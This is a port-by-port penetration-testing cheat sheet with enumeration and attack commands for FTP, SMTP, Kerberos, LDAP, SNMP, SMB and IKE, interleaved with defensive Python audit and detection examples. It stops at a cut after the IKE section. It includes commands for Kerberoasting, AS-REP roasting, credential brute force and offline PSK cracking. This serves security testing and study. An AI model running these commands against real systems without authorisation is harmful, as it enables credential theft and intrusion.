Ports / Services
21 TCP - FTP
ftp
| Action | Command |
|---|---|
| Connect to server | ftp <ip address> |
| Upload file | put <file> |
| Download file | get <file> |
| Upload multiple files | mput * |
| Download multiple files | mget * |
| Show/change local current directory | lcd [<dir>] |
| Set binary mode | binary |
wget
| Action | Command |
|---|---|
| Recursively download FTP contents | wget -r ftp://<user>@<ip address> --password=<password> |
| Mirror FTP | wget --mirror ftp://<user>:<password>@<ip address> |
proftp
- ProFTPD's mod_copy lets a client copy a file between remote directories (SITE CPFR / SITE CPTO) using only the server's write permissions, with no upload from the client.
| Action | Command |
|---|---|
| Connect to FTP server | telnet <ip address> <port> |
| Select a file to copy | site cpfr <remote file> |
| Select a location to copy file to | site cpto <remote directory to copy file to> |
22 TCP - SSH
- Brute-force credentials using:
  - Hydra
  - Crowbar (for private keys)
  - Metasploit ssh_login module
25 TCP - SMTP
- Attack paths
  - Enumerate users: VRFY <username>, EXPN <list>, RCPT TO acceptance testing (after MAIL FROM:<>; compare 250 vs 550)
  - Timing differences between valid/invalid RCPT TO
  - Re-test after STARTTLS (behavior may change)
  - Open relay / mis-scoped relay (test on ports 25/587/465)
  - Spoofing exposure due to weak SPF/DKIM/DMARC
  - SMTP AUTH spray/brute on submission ports (587/465) if AUTH is advertised
  - NTLM relay to SMTP if AUTH NTLM is enabled
  - STARTTLS downgrade risk (opportunistic-only TLS)
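The SPF/DKIM/DMARC weakness listed above can be judged from the published records alone. The following Python evaluator is an added example and is not part of the original cheat sheet: it reads a domain's SPF record, extracts the qualifier on the all mechanism, reads the DMARC p= tag, and reports the combinations that leave the domain spoofable (+all, ?all, no all term, missing or p=none DMARC). The TXT records are constructed samples embedded inline; in practice you would fetch them with the TXT queries in the DNS section (dig <name> TXT +short for the domain and for _dmarc.<domain>). DKIM is not checked because selectors are not discoverable from the domain name alone.

```python
import re

# Constructed sample TXT records for three hypothetical domains (not from the
# original page). Keys are the names you would query; _dmarc.<domain> holds
# the DMARC record.
SAMPLE_TXT = {
    "weak.example": ["v=spf1 ip4:192.0.2.0/24 ?all"],
    "_dmarc.weak.example": [],
    "strict.example": ["v=spf1 mx include:_spf.example.net -all"],
    "_dmarc.strict.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@strict.example; pct=100"],
    "monitor.example": ["v=spf1 +all"],
    "_dmarc.monitor.example": ["v=DMARC1; p=none; rua=mailto:dmarc@monitor.example"],
}


def spf_record(txt_records):
    """Return the single SPF record, or None if there are zero or several
    (RFC 7208 treats both cases as a permanent error)."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    return spf[0] if len(spf) == 1 else None


def spf_all_qualifier(record):
    """Return the qualifier on the 'all' mechanism ('+', '-', '~' or '?'),
    or None if the record has no 'all' term. A bare 'all' means '+'."""
    for term in record.split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    return None


def dmarc_policy(txt_records):
    """Return the DMARC 'p=' value in lowercase, or None if no DMARC record."""
    for r in txt_records:
        if r.lower().startswith("v=dmarc1"):
            tags = {}
            for kv in r.split(";"):
                if "=" in kv:
                    k, v = kv.strip().split("=", 1)
                    tags[k.strip().lower()] = v.strip()
            return tags.get("p", "").lower() or None
    return None


def assess_domain(domain, txt=SAMPLE_TXT):
    """List the SPF/DMARC weaknesses that leave the domain spoofable."""
    findings = []
    spf = spf_record(txt.get(domain, []))
    if spf is None:
        findings.append("SPF: missing or multiple records")
    else:
        q = spf_all_qualifier(spf)
        if q in ("+", None):
            findings.append("SPF: any host may send (+all or no all mechanism)")
        elif q == "?":
            findings.append("SPF: neutral (?all) gives no protection")
        elif q == "~":
            findings.append("SPF: softfail (~all) relies on DMARC being enforced")
    policy = dmarc_policy(txt.get("_dmarc." + domain, []))
    if policy is None:
        findings.append("DMARC: no record, spoofed mail is neither quarantined nor rejected")
    elif policy == "none":
        findings.append("DMARC: p=none only monitors, it does not block spoofing")
    return findings


if __name__ == "__main__":
    for d in ("weak.example", "strict.example", "monitor.example"):
        print(d, assess_domain(d) or ["OK"])
```

A -all record with p=reject (strict.example) produces no findings; the other two constructed domains show the typical gaps: a neutral ?all with no DMARC record, and a +all record whose p=none DMARC policy merely reports abuse instead of stopping it.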
SMTP commands
Miscellaneous
| Action | Command |
|---|---|
| Connect to SMTP server | telnet <ip> <port> or nc -nvC <ip> <port> |
| Verify an email address | VRFY <username> |
| List a mailing list’s membership | EXPN <list> |
| Keepalive / test | NOOP |
| Reset current transaction | RSET |
| Help | HELP |
| Quit | QUIT |
Send an email
| Step | Command |
|---|---|
| 1 | EHLO <client-hostname> (or HELO <client-hostname>) |
| 2 | STARTTLS (optional; if used, run EHLO again after TLS) |
| 3 | AUTH LOGIN (must use EHLO first; the server asks for the username and then the password, each base64-encoded) |
| 4 | MAIL FROM:<sender@example.com> |
| 5 | RCPT TO:<recipient@example.com> (repeat per recipient) |
| 6 | DATA |
| 7 | . (type headers + blank line + body, then a single . on a line by itself) |
| 8 | QUIT (optional) |
Minimal RCPT-based enumeration (no delivery)
EHLO <client-fqdn> - do not include angle brackets
MAIL FROM:<> - keep the angle brackets, purposely empty.
RCPT TO:<user@domain> - keep the angle brackets
- EHLO can be an IP-literal if needed (e.g., EHLO [192.0.2.10]); if refused, use HELO.
- If you use STARTTLS, run EHLO again post-TLS.
- Responses: 250 = valid user, 550 = no such user.
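Because the RCPT-based probe above never delivers mail, it is visible on the receiving server only as a run of 550 rejections for different recipients from one client, usually with an empty MAIL FROM. The Python detector below is an added example (not part of the original page or any tool it lists) that applies that logic to a few constructed Postfix-style smtpd log lines: it groups 550 RCPT rejections by client address, counts distinct rejected recipients inside a sliding time window, and flags clients that exceed a threshold, also reporting how many of their probes used the null sender.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Postfix-style smtpd log lines (not from the original page): one
# client probes five recipients with an empty sender in two seconds, and an
# unrelated partner MTA bounces once off a stale address.
SAMPLE_LOG = """\
Mar  3 10:15:01 mx1 postfix/smtpd[2212]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 550 5.1.1 <alice@example.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<alice@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:01 mx1 postfix/smtpd[2212]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<bob@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:02 mx1 postfix/smtpd[2212]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 550 5.1.1 <carol@example.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<carol@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:02 mx1 postfix/smtpd[2212]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 550 5.1.1 <dave@example.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<dave@example.com> proto=ESMTP helo=<probe>
Mar  3 10:15:03 mx1 postfix/smtpd[2212]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 550 5.1.1 <erin@example.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<erin@example.com> proto=ESMTP helo=<probe>
Mar  3 10:20:44 mx1 postfix/smtpd[2290]: NOQUEUE: reject: RCPT from mail.partner.example[198.51.100.9]: 550 5.1.1 <old-user@example.com>: Recipient address rejected: User unknown in local recipient table; from=<ops@partner.example> to=<old-user@example.com> proto=ESMTP helo=<mail.partner.example>
"""

# Matches a Postfix "NOQUEUE: reject: RCPT" line with a 550 status and pulls
# out the syslog timestamp, client IP, envelope sender and rejected recipient.
RCPT_REJECT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: RCPT from \S+\[(?P<ip>[^\]]+)\]: 550 .*?"
    r"from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]+)>"
)


def detect_rcpt_enumeration(log_text, min_distinct=5, window_seconds=60):
    """Return {client_ip: {...}} for clients whose 550 RCPT rejections cover at
    least min_distinct different recipients within any window_seconds span."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = RCPT_REJECT.match(line)
        if not m:
            continue
        # syslog stamps carry no year; that is fine for deltas within one file
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        by_ip[m["ip"]].append((ts, m["rcpt"].lower(), m["sender"] == ""))

    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        in_window = defaultdict(int)  # recipient -> hits inside the sliding window
        start, peak = 0, 0
        for ts, rcpt, _ in events:
            in_window[rcpt] += 1
            # drop events that fell out of the window ending at this event
            while (ts - events[start][0]).total_seconds() > window_seconds:
                old = events[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= min_distinct:
            alerts[ip] = {
                "distinct_recipients": peak,
                "null_sender_probes": sum(1 for _, _, null in events if null),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_rcpt_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info}")
```

The threshold and window are deliberately parameters: a legitimate MTA retrying one stale address looks nothing like five distinct unknown users in two seconds, and the null-sender count separates enumeration probes from ordinary bounces that carry a real sender.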
53 TCP - DNS
nslookup
| Action | Command |
|---|---|
| Interactive shell | nslookup |
| Query A (default resolver) | nslookup <name> |
| Query via specific server | nslookup <name> <server> |
| MX records | nslookup -type=mx <domain> |
| NS records | nslookup -type=ns <domain> |
| SOA record | nslookup -type=soa <domain> |
| TXT record | nslookup -type=txt <name> |
| Reverse (PTR) | nslookup <ip> |
| Zone transfer attempt | nslookup -type=AXFR <domain> <server> |
host
| Action | Command |
|---|---|
| Query A | host <name> |
| Reverse (PTR) | host <ip> |
| MX records | host -t mx <domain> |
| NS records | host -t ns <domain> |
| SOA record | host -t soa <domain> |
| TXT record | host -t txt <name> |
| Zone transfer (AXFR) | host -l <domain> <server> |
dig
| Action | Command |
|---|---|
| A via specific server | dig @<server> <name> A +short |
| Reverse (PTR) | dig -x <ip> +short |
| MX records | dig @<server> <domain> MX +short |
| NS records | dig @<server> <domain> NS +short |
| SOA record | dig @<server> <domain> SOA +short |
| TXT record | dig @<server> <name> TXT +short |
| Zone transfer (AXFR) | dig @<server> <domain> AXFR +tcp |
| Trace delegation path | dig +trace <name> |
| CHAOS version.bind | dig @<server> -c CH -t TXT version.bind +short |
DNSRecon
| Action | Command |
|---|---|
| Standard records | dnsrecon -d <domain> |
| Standard against specific NS | dnsrecon -d <domain> -n <server> -t std |
| Zone transfer attempt | dnsrecon -d <domain> -t axfr -n <server> |
| Subdomain brute force | dnsrecon -d <domain> -D <wordlist> -t brt |
| Reverse sweep | dnsrecon -r <cidr> -n <server> |
69 UDP - TFTP
79 TCP - Finger
$ nc -nv 192.168.108.140 79
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.108.140:79.
charlotte
Login: charlotte Name: Charlotte
[No profile information]
80 TCP - HTTP
- Cleartext / unencrypted web service
88 TCP - Kerberos
Attack paths
- Username enumeration with kerbrute
kerbrute userenum -d <domain> <userlist>
- AS-REP Roasting (no pre-auth)
impacket-GetNPUsers -dc-ip <dc_ip> <domain>/ -no-pass -usersfile <users.txt> -outputfile <hashes.txt>
- Kerberoasting (retrieve all roastable users + hashes)
impacket-GetUserSPNs -dc-ip <dc_ip> <domain>/<user>:'<pass>' -request -outputfile <hashes.txt>
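Both roasting checks above rest on two account properties that are plainly visible in the directory: the DONT_REQ_PREAUTH bit of userAccountControl (AS-REP roasting) and a servicePrincipalName on an ordinary user account (Kerberoasting). The Python below is an added example, not from the original page or from the tools it lists: it decodes the userAccountControl bitmask using Microsoft's documented flag values and audits a constructed list of accounts for the exposures a defender would want to remove. The same check applies to the accounts reported by the nxc ldap --asreproast and --kerberoast commands in the 389 TCP section; the entries, names and SPNs here are hypothetical.

```python
# Documented userAccountControl flag bits (Microsoft ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Constructed directory entries for a hypothetical domain (not from the original
# page). userAccountControl is the decimal string an LDAP query returns.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_backup", "userAccountControl": "66048",      # normal + pwd never expires
     "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"]},
    {"sAMAccountName": "legacy_app", "userAccountControl": "4194816",    # normal + no pre-auth
     "servicePrincipalName": []},
    {"sAMAccountName": "old_admin", "userAccountControl": "4194818",     # disabled + no pre-auth
     "servicePrincipalName": []},
    {"sAMAccountName": "DC01$", "userAccountControl": "532480",          # DC trust + delegation
     "servicePrincipalName": ["HOST/dc01.corp.example"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": "528384",         # workstation + delegation
     "servicePrincipalName": ["HOST/web01.corp.example"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": "514",            # disabled by design
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "jdoe", "userAccountControl": "512",
     "servicePrincipalName": []},
]


def decode_uac(value):
    """Return the set of flag names set in a userAccountControl value (int or str)."""
    value = int(value)
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def audit(entries):
    """Group enabled accounts by Kerberos-relevant exposure:
    asrep_roastable: accounts that do not require Kerberos pre-authentication;
    kerberoastable_users: normal user accounts carrying an SPN (machine and DC
      trust accounts have long random passwords and are excluded);
    unconstrained_delegation: non-DC accounts trusted for delegation."""
    report = {"asrep_roastable": [], "kerberoastable_users": [], "unconstrained_delegation": []}
    for e in entries:
        flags = decode_uac(e["userAccountControl"])
        name = e["sAMAccountName"]
        if "ACCOUNTDISABLE" in flags:
            continue  # disabled accounts cannot be roasted or delegated to
        if "DONT_REQ_PREAUTH" in flags:
            report["asrep_roastable"].append(name)
        if e["servicePrincipalName"] and "NORMAL_ACCOUNT" in flags:
            report["kerberoastable_users"].append(name)
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            report["unconstrained_delegation"].append(name)
    return report


if __name__ == "__main__":
    for category, names in audit(SAMPLE_ENTRIES).items():
        print(f"{category}: {names}")
```

The disabled old_admin account is skipped even though its pre-auth bit is set, and DC01$ is excluded from the delegation list because domain controllers are trusted for delegation by design; the remaining three names are the ones worth a ticket.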
110 TCP - POP3
- Post Office Protocol
- Used by mail clients to retrieve (download) email from the server.
Commands
| Action | Command |
|---|---|
| Connect to server | nc -nv <ip address> <port> or nc -nvC <ip address> <port> |
| Pick username to login with | USER <username> |
| Enter password | PASS <password> |
| List emails | LIST |
| Read email | RETR <email # from list> |
111 TCP – rpcbind / NFS
- RPC portmapper. Maps RPC program numbers to the TCP/UDP ports those services use (e.g., NFS, mountd, nlockmgr, statd, rquotad). If 111 is open, check for NFS (2049) and related RPC services. Note: NFSv3 typically uses rpcbind; NFSv4 can run on 2049 alone.
What to look for (findings)
- World-readable/writable exports (e.g., *(rw) or wide subnets).
- no_root_squash (client root = server root on export).
- Sensitive paths exported (home dirs, backups, app secrets).
- UID/GID-based access: to read as a specific UID on a mounted share, run commands as that UID (e.g., sudo -u '#1001' ls /mnt/nfs/...).
- Kerberized NFS required? (e.g., sec=krb5*): you won’t mount without proper creds.
nmap
nmap -sV -sU -p111,2049 --script "rpcinfo,nfs-*" <ip>
rpcinfo
| Action | Command |
|---|---|
| List registered RPC programs and ports | rpcinfo -p <ip> |
| Summary by transport (tcp/udp) | rpcinfo -s <ip> |
| Query a specific program/version over a transport | rpcinfo -T tcp <ip> <prog> <vers> |
showmount
| Action | Command |
|---|---|
| List exports | showmount -e <ip> |
| List clients using exports | showmount -a <ip> |
mount / umount
| Action | Command |
|---|---|
| Mount NFSv3 export | sudo mount -t nfs -o ro,vers=3 <ip>:/<export> /mnt/nfs |
| Mount NFSv4 root | sudo mount -t nfs4 -o ro <ip>:/ /mnt/nfs |
| Unmount | sudo umount /mnt/nfs |
113 TCP – ident
- Legacy Identification Protocol (RFC 1413): maps a TCP connection to the local username on the target. Often disabled/firewalled; useless behind NAT.
nmap
| Action | Command |
|---|---|
| Identify ident service | nmap -p113 -sV <host> |
| Enumerate owners of listening services via ident | nmap -p113 --script=auth-owners <host> |
| Try ident against all open TCP ports (slower) | nmap -sT --script=auth-owners -p- <host> |
- Manual probe (requires a live TCP connection to the target port): connect to some service on the host, then to port 113, and send <server-port> , <your-src-port> terminated by CRLF.
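The manual probe above is the whole RFC 1413 protocol: one request line and one reply line. The Python below is an added example (not from the original page) that builds the request for a given connection and parses either form of reply, USERID or ERROR, into a dictionary. It shows concretely what a reachable ident daemon discloses, namely the local username that owns a connection, which is why the service is normally disabled or firewalled. The sample reply lines are constructed.

```python
import re

# RFC 1413 exchange: the querying side sends "<port-on-server> , <port-on-client>"
# for an existing TCP connection, and the ident daemon on the target replies
# "... : USERID : <opsys> : <user-id>" or "... : ERROR : <error-type>".
RESPONSE_RE = re.compile(
    r"^\s*(\d+)\s*,\s*(\d+)\s*:\s*(USERID|ERROR)\s*:\s*(.*?)\s*\r?\n?$"
)


def build_request(server_port, client_port):
    """Return the request line for the connection <server_port> <-> <client_port>."""
    return f"{server_port} , {client_port}\r\n"


def parse_response(line):
    """Parse an ident reply into a dict; returns None if the line is malformed."""
    m = RESPONSE_RE.match(line)
    if not m:
        return None
    server_port, client_port, kind, rest = m.groups()
    result = {"server_port": int(server_port), "client_port": int(client_port)}
    if kind == "ERROR":
        # RFC 1413 error types: INVALID-PORT, NO-USER, HIDDEN-USER, UNKNOWN-ERROR
        result["error"] = rest.strip()
        return result
    # USERID replies carry "<opsys>[,<charset>] : <user-id>"
    opsys, sep, userid = rest.partition(":")
    if not sep:
        return None
    result["opsys"] = opsys.strip()
    result["userid"] = userid.strip()
    return result


if __name__ == "__main__":
    # constructed sample replies, not captured traffic
    print(build_request(22, 54321).strip())
    print(parse_response("22 , 54321 : USERID : UNIX : alice\r\n"))
    print(parse_response("22 , 54322 : ERROR : NO-USER\r\n"))
```

A HIDDEN-USER error means the daemon is configured to withhold the name for that connection; a USERID reply with a real account name is the finding, since it ties a network connection to a local login without any authentication.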
119 TCP - NNTP
- Network News Transfer Protocol
Commands
| Action | Command |
|---|---|
| Connect to server | nc -nv <ip> <port> |
| List available newsgroups | LIST |
Example LIST output:
215 list of newsgroups follows
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
The 0 in each column means the first and last article number for each newsgroup is 0, i.e., there are no articles available to read.
135 TCP - MSRPC
impacket-rpcdump
- Query the Endpoint Mapper to list RPC endpoints, interfaces (UUIDs), and their dynamic ports.
| Action | Command |
|---|---|
| Enumerate RPC endpoints (unauth) | impacket-rpcdump <target> |
| Enumerate with credentials | impacket-rpcdump <domain>/<user>:<pass>@<target> |
impacket-rpcmap
- Query the RPC management interface to list bound DCE/RPC interfaces on a given transport/port.
| Action | Command |
|---|---|
| List interfaces via EPM on TCP/135 | impacket-rpcmap 'ncacn_ip_tcp:<ip>' |
| List interfaces on a specific RPC port | impacket-rpcmap 'ncacn_ip_tcp:<ip>[1025]' |
| List via SMB named pipe (EPM) | impacket-rpcmap 'ncacn_np:<ip>[\\pipe\\epmapper]' |
Nmap – msrpc-enum (NSE)
- Nmap script that queries the MS-RPC endpoint mapper and summarizes mapped services.
| Action | Command |
|---|---|
| Enumerate mapped RPC services | nmap -p135 --script msrpc-enum <target> |
| Same, with SMB auth (if supported) | nmap -p135 --script msrpc-enum --script-args smbusername=<user>,smbpassword=<pass> <target> |
137/UDP – NetBIOS Name Service (NBNS)
- Legacy name resolution and Node Status.
- Works only if NetBIOS over TCP/IP is enabled and UDP/137 is reachable.
nbtscan
| Action | Command |
|---|---|
| Enumerate NetBIOS names | sudo nbtscan -r <cidr> |
139/TCP – NetBIOS Session Service
- Legacy transport for SMB1 (NT1).
- Modern SMB (SMB2/3) uses 445 and does not require NetBIOS.
- Enumeration on 139 works only if SMB1 is enabled on the target.
- Only useful if 445 is unavailable or the host is SMB1-only.
- Test SMB1 on 139:
smbclient -L <ip> -p 139 -m NT1
- Null session via RPC:
rpcclient -U '' -N -p 139 <ip>
- See SMB & RPC Enumeration
143 TCP - IMAP
Commands
| Action | Command |
|---|---|
| Connect to service (cleartext) | nc -nv <ip> 143 |
| Connect to service (TLS) | openssl s_client -crlf -quiet -starttls imap -connect <host>:143 |
| Login (every IMAP command carries a client tag, e.g. A1) | A1 LOGIN <username> <password> |
| Login (quoted values) | A1 LOGIN "<username>" "<password>" |
| List all folders/mailboxes | A1 LIST "" * |
| List INBOX children | A1 LIST INBOX * |
| List “Archive” children | A1 LIST "Archive" * |
| Create folder/mailbox | A1 CREATE "<name>" |
| Delete folder/mailbox | A1 DELETE <name> |
| Rename folder/mailbox | A1 RENAME <old> <new> |
| List subscribed folders | A1 LSUB "" * |
| Mailbox status | A1 STATUS INBOX (MESSAGES UNSEEN RECENT) |
| Select mailbox | A1 SELECT INBOX |
| List messages (flags) | A1 FETCH 1:* (FLAGS) |
| List messages by UID (flags) | A1 UID FETCH 1:* (FLAGS) |
| Retrieve message body (text) | A1 FETCH 2 BODY[TEXT] |
| Retrieve message (all) | A1 FETCH 2 ALL |
| Retrieve by UID (peek, does not set \Seen) | A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) |
| Close mailbox | A1 CLOSE |
| Logout | A1 LOGOUT |
161 UDP - SNMP
- SNMP: protocol for managing/monitoring network devices (typically UDP/161 for queries, UDP/162 for traps).
- MIB (Management Information Base): hierarchical definitions (OIDs) of manageable data; devices expose values for those objects.
- Security: SNMPv1/v2c send community strings and data in cleartext (no auth/integrity/encryption) → sniffing, spoofing, replay possible; ACLs based on source IP can be bypassed with spoofing. SNMPv3 provides authentication and encryption (auth/priv) and timeliness checks.
- Defaults: “public” (RO) and “private” (RW) community strings are historically common and still encountered on misconfigured gear.
MIB Objects / OIDs:
| MIB Object | OID |
|---|---|
| TCP Local Ports | 1.3.6.1.2.1.6.13.1.3 |
| User Accounts | 1.3.6.1.4.1.77.1.2.25 |
| Software Name | 1.3.6.1.2.1.25.6.3.1.2 |
| Storage Units | 1.3.6.1.2.1.25.2.3.1.4 |
| Processes Path | 1.3.6.1.2.1.25.4.2.1.4 |
| Running Programs | 1.3.6.1.2.1.25.4.2.1.2 |
| System Processes | 1.3.6.1.2.1.25.1.6.0 |
onesixtyone
- SNMP scanner / community string brute force
| Action | Command |
|---|---|
| Scan with community wordlist | onesixtyone -c <communities.txt> <cidr-or-host> |
| Scan host list | onesixtyone -c <communities.txt> -i <hosts.txt> |
snmpget
| Action | Command |
|---|---|
| Read single OID (v2c) | snmpget -v2c -c <community> <ip> <OID> |
snmpwalk
- Probe and query SNMP values
| Action | Command |
|---|---|
| Walk entire tree (v1) | snmpwalk -v1 -c <community> <ip> . |
| Walk entire tree (v2c) | snmpwalk -v2c -c <community> <ip> . |
| Walk specific OID (v2c) | snmpwalk -v2c -c <community> <ip> <OID> |
| Walk (v3, authPriv) | snmpwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
snmpbulkwalk
| Action | Command |
|---|---|
| Bulk walk (v2c) | snmpbulkwalk -v2c -c <community> <ip> . |
| Bulk walk (v3, authPriv) | snmpbulkwalk -v3 -l authPriv -u <user> -a SHA -A <authpass> -x AES -X <privpass> <ip> . |
389 TCP - LDAP
- Plaintext LDAP service
- Retrieve global catalog information from a Domain Controller (DC).
ldapsearch
| Action | Command |
|---|---|
| Basic search (anonymous) | ldapsearch -H ldap://<ip> -x |
| Authenticate as user (simple bind) | ldapsearch -H ldap://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Retrieve naming contexts | ldapsearch -H ldap://<ip> -x -s base -b '' namingcontexts |
| Dump a naming context | ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=*)' |
| Query with filter (template) | ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '<LDAP filter>' |
| All people (common attrs) | ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(objectClass=person)' sAMAccountName memberOf |
| Single user by sAMAccountName | ldapsearch -H ldap://<ip> -x -b 'DC=<x>,DC=<y>' '(&(objectClass=user)(sAMAccountName=<user>))' sAMAccountName memberOf pwdLastSet |
| Domain Admins members | ldapsearch -H ldap://<ip> -x -b 'DC=htb,DC=local' '(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))' sAMAccountName |
| (Alt) Direct LDAPS | ldapsearch -H ldaps://<ip> -x -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
| Count attribute names in a dump to spot interesting information | awk '{print $1}' <ldap_dump.ldif \| sort \| uniq -c \| sort -nr |
- If the bind fails with ldap_bind: Strong(er) authentication required (8), the DC refuses simple binds over a cleartext connection; trust its certificate and retry over STARTTLS:
| Action | Command |
|---|---|
| Fetch server certificate | echo -n \| openssl s_client -connect <dc_fqdn>:636 \| sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ldapserver.pem |
| Trust cert for ldap-tools | echo 'TLS_CACERT <path>/ldapserver.pem' \| sudo tee -a /etc/ldap/ldap.conf |
| Re-run with STARTTLS | ldapsearch -H ldap://<ip> -x -Z -D '<user>@<domain>' -w '<password>' -b 'DC=<x>,DC=<y>' |
nxc
- Fast AD LDAP enumeration (users/groups/computers, policy, roastable accounts). Target a DC for best results.
| Action | Command |
|---|---|
| Anonymous bind check (user enum) | nxc ldap <dc_ip> -u '' -p '' --users |
| Enumerate users | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --users |
| Enumerate groups | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --groups |
| Enumerate computers | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --computers |
| Password policy | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --password-policy |
| List SPNs | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --spns |
| Kerberoast (dump hashes to file; the option takes the output file as its argument) | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --kerberoast kerberoast.txt |
| AS-REP roast (no-preauth users, output to file) | nxc ldap <dc_ip> -u <user> -p '<pass>' -d <domain> --asreproast asrep.txt |
Notes: Works against Windows DCs and Samba AD DCs; may work against domain-joined members but is policy-dependent. Use valid creds; anonymous binds often fail in modern domains.
443 TCP - HTTPS
sslscan
- Quick cipher/protocol/certificate survey.
| Action | Command |
|---|---|
| Quick scan | sslscan <host>:443 |
| Show only accepted suites | sslscan --no-failed <host>:443 |
| Save XML report | sslscan --xml=sslscan.xml <host>:443 |
testssl.sh
- Deeper checks (protocols, ciphers, vulns), good for internal hosts.
| Action | Command |
|---|---|
| Quick scan | testssl <host>:443 |
| Faster overview | testssl --fast <host>:443 |
| Save JSON report | testssl --jsonfile out.json <host>:443 |
SSL Labs
- External grading (internet-reachable hosts only). Use web UI or CLI.
| Action | Command |
|---|---|
| Check using website | https://www.ssllabs.com/ssltest/analyze.html?d=<host> |
| Check using CLI tool | ssllabs-scan --usecache --quiet <host> |
445 TCP – SMB
Enumerate Samba Version
| Method | Steps |
|---|---|
| Wireshark | Log in anonymously with smbclient -L \\<ip address>, then search for a packet with "Session Setup AndX Response" in the Info field. |
| ngrep & smbclient | Terminal 1: ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' port 139 ; Terminal 2: echo exit \| smbclient -L <ip address> |
464 TCP & UDP - kpasswd5
- Kerberos v5 password change/reset service on AD domain controllers (TCP/UDP 464). Implements RFC 3244 “Change/Set Password” via the kadmin/changepw service, allowing users to change their own (including expired) passwords and admins to reset others, with domain policy enforcement. Typically invoked by kpasswd or automatically during kinit when a change is required.
500 UDP – ISAKMP / IKE
- IKE (Internet Key Exchange) negotiates IPsec Security Associations (SAs) and keys within the ISAKMP framework on UDP 500 (and UDP 4500 for NAT-Traversal).
- IPsec data planes:
- AH (integrity, origin, anti-replay)
- ESP (adds confidentiality).
- Modes:
- Transport (encrypts payload)
- Tunnel (encapsulates whole IP packet).
- Versions:
- IKEv1 (Main/Aggressive)
- IKEv2 (simplified handshake, better NAT/mobility).
- Auth typically via PSK or certificates.
ike-scan
| Action | Command |
|---|---|
| Probe IKE (v1, Main Mode) | ike-scan -M <ip> |
| Probe IKE (v1, Aggressive Mode) | ike-scan -A <ip> |
| Probe IKEv2 | ike-scan --ikev2 <ip> |
| Show transforms/auth methods (verbose) | ike-scan -M -v <ip> |
| Capture the Aggressive Mode handshake for offline PSK cracking | ike-scan -A [--sport=<port>] --pskcrack=ike.txt <ip> |
| Crack PSK offline (dictionary) | psk-crack --dictionary <wordlist> ike.txt |
- Some Aggressive-Mode implementations (notably Cisco ASA) return a fake hash when an invalid ID is used.
- Comprehensive Aggressive Mode PSK check across ID types (3 = user FQDN, 11 = key ID, 1 = IPv4 address, 2 = FQDN):
